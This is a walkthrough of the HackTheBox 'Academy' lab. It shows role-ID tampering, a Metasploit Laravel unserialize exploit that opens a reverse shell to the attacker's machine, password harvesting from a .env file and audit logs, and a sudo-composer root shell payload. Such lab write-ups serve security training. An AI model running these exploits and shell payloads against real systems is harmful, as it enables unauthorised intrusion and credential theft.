HackTheBox - Academy write up
5 min read

HackTheBox - Academy write up

HackTheBox - Academy write up

Academy is a Easy Linux box created the 7 November 2020.

Recon

Port scan :

$ nmap -A -p -1024 -oN scan.nmap 10.10.10.215

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only SSH on port 22 and a Apache Web Server on port 80 are open.

Web

There is the apache web page :

http://academy.htb/index.php

I intercept the request when we try to register a user.

We can see the username & password, but what is the roleid variable ? If you change it to 1, you can create admin user :)

While I was looking at the website, gobuster found us different pages :

/index.php            (Status: 200) [Size: 2117]
/login.php            (Status: 200) [Size: 2627]
/register.php         (Status: 200) [Size: 3003]
/images               (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/admin.php            (Status: 200) [Size: 2633]
/home.php             (Status: 302) [Size: 55034] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 276]

Let’s go to admin.php and log in with our admin user named toto. It works ! Now we have this todo list :

We can see the last issue is pending. Let’s add the virtual host to /etc/hosts.

10.10.10.215 academy.htb dev-staging-01.academy.htb
/etc/hosts

Let’s visit dev-staging-01.academy.htb.

This is a Laravel (PHP framework) app. Thanks to the debug mode, we can retrieve some variables :

APP_NAME  "Laravel"
APP_KEY   "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG   "true"
DB_CONNECTION   "mysql"
DB_HOST   "127.0.0.1"
DB_PORT   "3306"
DB_DATABASE   "homestead"
DB_USERNAME   "homestead"
DB_PASSWORD   "secret"
BROADCAST_DRIVER  "log"

User #1

After some research, we can find a Laravel exploit on metasploit.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
Module options (exploit/unix/http/laravel_token_unserialize_exec):
   Name       Current Setting                               Required
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no
   Proxies                                                  no
   RHOSTS     10.10.10.215                                  yes
   RPORT      80                                            yes
   SSL        false                                         no
   TARGETURI  /                                             yes
   VHOST      dev-staging-01.academy.htb                    no
...
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
[*] Started reverse TCP handler on 10.10.14.130:4444 
[*] Command shell session 2 opened (10.10.14.130:4444 -> 10.10.10.215:48794) at 2020-12-22 18:49:42 +0100
shell
[*] Trying to find binary(python) on target machine
[-] 
[*] Trying to find binary(python3) on target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /usr/bin/bash
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@academy:/var/www/html/htb-academy-dev-01/public$

We have a shell !

User #2

Time to privesc (Privilege Escalation) !

I find some passwords in application source code but it was not interesting, then I find this environment file :

www-data@academy:/var/www/html/academy$ cat .env
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

This password was reused by one of the users.

www-data@academy:/home$ su cry0l1t3
Password: mySup3rP4s5w0rd!!
$ bash
cry0l1t3@academy:/home$

Our user is in the adm group, so we can read all the logs file in /var/log. Let’s find some passwords :

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ grep -RE 'comm="su"|comm="sudo"' /var/log/ 2>/dev/null
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
$ aureport --tty
...
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
...
1) unhex(6D7262336E5F41634064336D79210A) = mrb3n_Ac@d3my!
2) aureport a tool that produces summary reports of audit daemon logs
--tty Report about tty keystrokes

We got mrb3n’s password !

Root

Time to get root !

mrb3n@academy:/dev/shm$ sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Thanks to GTFOBins, we know how to run shell command with composer. We have the sudo on composer, so we can run shell command as root :)

mrb3n@academy:/dev/shm$ TF=$(mktemp -d)
mrb3n@academy:/dev/shm$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/dev/shm$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
474041e356040d30....

Rooted !

Enjoying these posts? Subscribe for more